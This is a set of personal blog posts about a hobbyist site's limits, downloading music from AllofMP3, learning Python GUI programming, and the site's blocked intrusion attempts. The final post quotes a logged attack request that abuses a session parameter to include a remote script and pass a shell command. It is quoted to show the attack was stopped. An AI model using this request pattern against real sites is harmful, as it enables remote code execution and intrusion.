Sometimes I feel like this blog is left behind in the dark ages of the internet, I can't post pictures from flicker my blog because it doesn't support XML-RPC, ping backs don't work and so on. It would be so nice to have these features like so many blogs do, I feel I would be more inspired to blog if this were the case. So why am I not using some online blogging service like Blogger or some blogging software such as Wordpress that already comes with these nice features?

AllofMP3.com is hands down the best source to download music from, having such a vast collection in the format/quality of your choice (Mines OGG q5) with no DRM means I have never spent so much money on music before and now have a very large collection of music and an even more varied taste in music.

AllofMP3 even produce a nice app for you to interface with their music store and add files to a queue which this app will download for you, great! If your using Linux however you can try and emulate this app under Wine/Crossover Office (a pain even if it works) or use a download manager and add all the files by one to many clicks for my liking. Well, there must be a better way? Actually, no, not that I could find. So to scratch my own itch I have started work on one dubbed AllofTUX (great name right? Laughing ).

I shall be releasing a version of it sometime in the not so distant future, GPL'ed of course. It's a simple app but I might expand it's feature set later on.

Everyone seems to be banging on about Python in the Linux community and with good reason. I have dabbled with Python but never created anything that really did anything so I decided to create a very simple CLI based chat server/client. Python makes handling socket's very easy and the whole program is just over 100 lines of code. I decided however that I wanted to learn more about building GUI apps via event driven programming, using Glade to design the GUI and GTK via PyGTK as the toolkit. So using a guide as reference titled GUI - The Pythonic Way (BTW the code in the guide does not run and has many bugs but I was interested in the information regarding how to use Glade and GTK with Python not the code to hack a calculator Cheeky) I created a basic calculator which to my surprise was very easy to do and rather fun and quick being only 91 lines of programming. The Calculator is now available from the Programming Page.

Having heard about how Python can run on other OS's my next stop was Windows. Don't worry I didn't leave Linux to do this, just emulated WinXP using VMware. Amazingly after installing Python, GTK, PyGTK and PyCairo. All I had to do was start the program and that was it, it was working fine under Windows with no modifications to the code which is very impressive, esp as it's the first time I have created a GUI app and had it run on more than one OS.

I shall certainly be experimenting more with Python, one day I might even hack something useful Cool

There have been 151 attacks on Summer Daze over the past few weeks. Some have tried to exploit SQL injection others have tried to exploit the server but I'm pleased to announce that all attacks were stopped before the attacker had a chance Winking

Instead I just got an email for each attack from the "Summer Daze Auto Mailer" informing me of an "Invalid Query String". With a message like the one that follows.

The following report was triggered by a Guest user (66.173.241.225) when accessing /modules.php?name=users&action=login
&PHPSESSID=http://www.sanicentrum.be/private/tool25.dot?
&cmd=cat%20bugado

Nice to know that LogicFury remains unhacked. I have no doubt that exploits will be discovered, no one can forsee and prevent every attack but it's nice to see some measures I have taken to prevent them working so well Cheeky
